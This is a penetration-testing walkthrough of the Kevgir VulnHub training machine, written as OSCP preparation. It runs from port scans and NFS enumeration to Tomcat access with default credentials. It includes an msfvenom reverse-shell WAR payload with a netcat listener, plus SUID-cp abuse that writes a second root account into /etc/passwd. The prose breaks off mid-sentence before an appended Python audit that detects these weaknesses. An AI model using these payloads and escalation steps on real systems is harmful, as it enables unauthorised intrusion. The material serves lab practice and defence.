This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and can be downloaded from vulnhub.
The description of the machine reads as follows:
Kevgir has been designed by the canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announce that.
https://www.vulnhub.com/entry/kevgir-1,137/
The walk-through is divided into a couple of sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for simplicity we stick to these three.
To start off we find the IP address of the machine with nmap, since netdiscover takes a while on my VMware. We use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP
To start on the machine itself, we scan it for open ports with nmap. We do two scans:
sudo nmap -sV -sC 192.168.0.138 -oA nmap
sudo nmap -sV -sC -p- 192.168.0.138 -oA fullnmap
The parameters mean:
-sV service and version enumeration,
-sC basic script usage,
-p- a full port scan,
-oA save all output in a couple of different formats.
The nmap results are:
# Nmap 7.80 scan initiated Tue Feb 18 13:46:13 2020 as: nmap -sV -sC -oA nmap 192.168.0.138
Nmap scan report for 192.168.0.138
Host is up (0.000068s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE     VERSION
25/tcp   open  ftp         vsftpd 3.0.2
|_smtp-commands: SMTP: EHLO 530 Please login with USER and PASS.\x0D
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Kevgir VM
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      32979/udp6  mountd
|   100005  1,2,3      37206/tcp   mountd
|   100005  1,2,3      47667/tcp6  mountd
|   100005  1,2,3      48358/udp   mountd
|   100021  1,3,4      37042/tcp6  nlockmgr
|   100021  1,3,4      37283/udp   nlockmgr
|   100021  1,3,4      37795/udp6  nlockmgr
|   100021  1,3,4      56540/tcp   nlockmgr
|   100024  1          44928/udp   status
|   100024  1          52040/tcp   status
|   100024  1          52398/tcp6  status
|   100024  1          53714/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
1322/tcp open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 17:32:b4:85:06:20:b6:90:5b:75:1c:6e:fe:0f:f8:e2 (DSA)
|   2048 53:49:03:32:86:0b:15:b8:a5:f1:2b:8e:75:1b:5a:06 (RSA)
|   256 3b:03:cd:29:7b:5e:9f:3b:62:79:ed:dc:82:c7:48:8a (ECDSA)
|_  256 11:99:87:52:15:c8:ae:96:64:73:d6:49:8c:d7:d7:9f (ED25519)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
8081/tcp open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Joomla! 1.5 - Open Source Content Management
| http-robots.txt: 14 disallowed entries
| /administrator/ /cache/ /components/ /images/
| /includes/ /installation/ /language/ /libraries/ /media/
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to the Frontpage
9000/tcp open  http        Jetty winstone-2.9
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(winstone-2.9)
|_http-title: Dashboard [Jenkins]
MAC Address: 00:0C:29:A2:8E:AF (VMware)
Service Info: Host: CANYOUPWNME; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 19m59s, deviation: 1h09m16s, median: 59m58s
|_nbstat: NetBIOS name: CANYOUPWNME, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: canyoupwnme
|   NetBIOS computer name: CANYOUPWNME\x00
|   Domain name:
|   FQDN: canyoupwnme
|_  System time: 2020-02-18T21:46:24+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-18T19:46:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 13:46:29 2020 -- 1 IP address (1 host up) scanned in 16.11 seconds
Well, that is a lot of ports. To keep it short, we have the following:
– 25 ftp, which includes a user in the banner
– 80 apache httpd
– 111 rpcbind with some possible nfs shares, which we might be able to mount
– 139, 445 netbios samba
– 1322 ssh
– 2049 rpc
– 8080 apache tomcat
– 8081 apache
– 9000 http Jetty
We start with the ftp port, since we might have a user and there might be some files with more information. We can not log in with USER and PASS or as anonymous. It is asking for USER and PASS, which we need to supply through telnet. Well, I learned something I guess haha :p
On port 80 we get a pretty empty webserver/webpage. To be sure, we run nikto to find possible vulnerabilities and dirb to fuzz directories:
nikto -host http://192.168.0.138 -output nikto.txt
dirb http://192.168.0.138 -o dirb.txt
So let's have a look at the results:
We found a /phpmyadmin/ directory. We tried some basic credentials but couldn't log in. Every time we tried, we got the message 1045 Cannot log in to the MySQL server. I googled the error message and it seems the mysql server is down or there is no account set up. No problem, not going to dive too deep into this. There is a lot more to explore!
Let's look at port 111, since rpcbind exposes a lot more here than on other machines. I may finally get to test this a bit. With the command showmount -e 192.168.0.138 we see that there is a /backup directory that can be mounted. With the command mount -t nfs 192.168.0.138:/backup /tmp/backupmount we mount the /backup directory:
-t sets the filesystem type to nfs,
192.168.0.138:/backup is the share we want to mount, and
/tmp/backupmount is where we want to mount it.
In the directory is a file named backup.tar.bz2.zip. It seems to be compressed a couple of times.
I tried unzipping the file, but it is password protected. Some basic passwords did not work! We may find some passwords later; I don't feel like bruteforcing it at the moment.
There are some other web services running. Tomcat should be on port 8080. Let's run another dirb and nikto scan, like we did before on port 80. These are the results:
We found a couple of manager directories. All are password protected, but I managed to log in with tomcat:tomcat on /manager, /host-manager and /manager/status. This is a good start. Let's find a possible exploit!
To exploit Tomcat I found several metasploit modules which abuse the /manager deployer or upload. I'm not interested in using metasploit at the moment, so let's google for a way to exploit it manually, since the manager offers an upload for deploying a directory, an XML file or a WAR file.
This guide shows the metasploit way, but also a way to generate a WAR file with msfvenom. No idea this was possible, awesome! Let's do it!!! We can do this with the following payload:
msfvenom -p java/shell_reverse_tcp lhost=192.168.0.129 lport=1234 -f war -o ~/kevgir/exploit.war
We now upload the file in the WAR file deploy section, start our listener with nc -lvp 1234 and click on the /exploit application in the tomcat manager. And we get a shell as the tomcat user!
I'm not going to write down all the things I try during my privilege escalation, but if I find something that doesn't work I will write it down. A good guide for finding possible privilege escalation vectors is this one from g0tmi1k.
I found a privilege escalation path through a kernel exploit. But this normally isn't the intended way for a vulnerable machine, so to learn more we will look for something else. It should work, though, since the machine runs an old Ubuntu version and kernel.
I got a full tty shell with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
vsftpd, smbd and rpcbind are running as root (ps aux | grep root).
In the /var/www/html/ folder we found a file configuration.php, which contains the database credentials and a server secret. In the database we found the administrator password hash for Joomla:
hash-identifier tells us it is an MD5 hash with a salt. Let's try to crack this online. Did not find anything, since there is a salt. Tried cracking it with hashcat and rockyou.txt, but no luck. I ran a brute force for a bit, but had no luck either.
With the command find /bin -perm -4000 I found the SUID bit set on cp. So we can copy any file as root? I copied the /etc/shadow file to /tmp/shadow to check if it worked. And we can read it:
Interesting, I think I can copy the /etc/passwd file to /tmp/passwd. To abuse this, we have to do the following:
Generate a hash for a password with openssl passwd foo, where the password is foo. The hash is
Then we cat the /etc/passwd file and copy the root entry:
Then we edit this entry with another username but the same IDs, so we can log in with it, and we replace the x with the hash. So we get:
roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash
But we can not echo this into /etc/passwd, since the permissions are not right! I should have checked that before I did all this.
4 -rw-r--r-- 1 root tomcat7 1446 Feb 18 23:52 passwd.
I worked around this by catting the output to another file named passwd in another directory and echoing the new line into /tmp/test/passwd. Then we can copy this /tmp/test/passwd file over /etc/passwd with the SUID bit set on
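The two weaknesses this escalation chains together, a SUID bit on cp and a second UID 0 account written into /etc/passwd, are both cheap to audit for. The following is an added example (not code from the original post): a Python audit that flags SUID binaries outside an allowlist and passwd entries like the roott line above. The allowlist and the sample passwd content are constructed assumptions.

```python
import os
import stat
import tempfile

# Assumed allowlist of binaries that normally carry SUID on an Ubuntu host; cp is not one of them.
SUID_ALLOWLIST = {"su", "sudo", "passwd", "mount", "umount", "ping", "chsh", "chfn", "gpasswd", "newgrp"}

def find_unexpected_suid(root_dir, allowlist=SUID_ALLOWLIST):
    """Walk root_dir and return basenames of regular files with the SUID bit set
    that are not on the allowlist (find -perm -4000 plus triage)."""
    hits = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            st = os.lstat(os.path.join(dirpath, name))
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and name not in allowlist:
                hits.append(name)
    return sorted(hits)

def audit_passwd(text):
    """Return findings for passwd content: an extra UID 0 account, or a hash stored
    inline instead of the 'x' that defers the password to /etc/shadow."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("malformed entry: " + line)
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append("extra UID 0 account: " + user)
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append("inline password hash for " + user)
    return findings

def suid_demo():
    """Build a throwaway directory holding a SUID cp, a SUID sudo and a plain ls, then audit it."""
    root = tempfile.mkdtemp()
    for name, mode in (("cp", 0o4755), ("sudo", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return find_unexpected_suid(root)

# Constructed passwd sample mirroring the entry appended in the walkthrough.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "tomcat7:x:106:115::/usr/share/tomcat7:/bin/false\n"
                 "roott:7kTk8t7eAN5xQ:0:0:root:/root:/bin/bash\n")
```

Running find_unexpected_suid("/") on the real host is the defender's equivalent of the find command above, and audit_passwd over the contents of /etc/passwd catches the roott entry on the first pass.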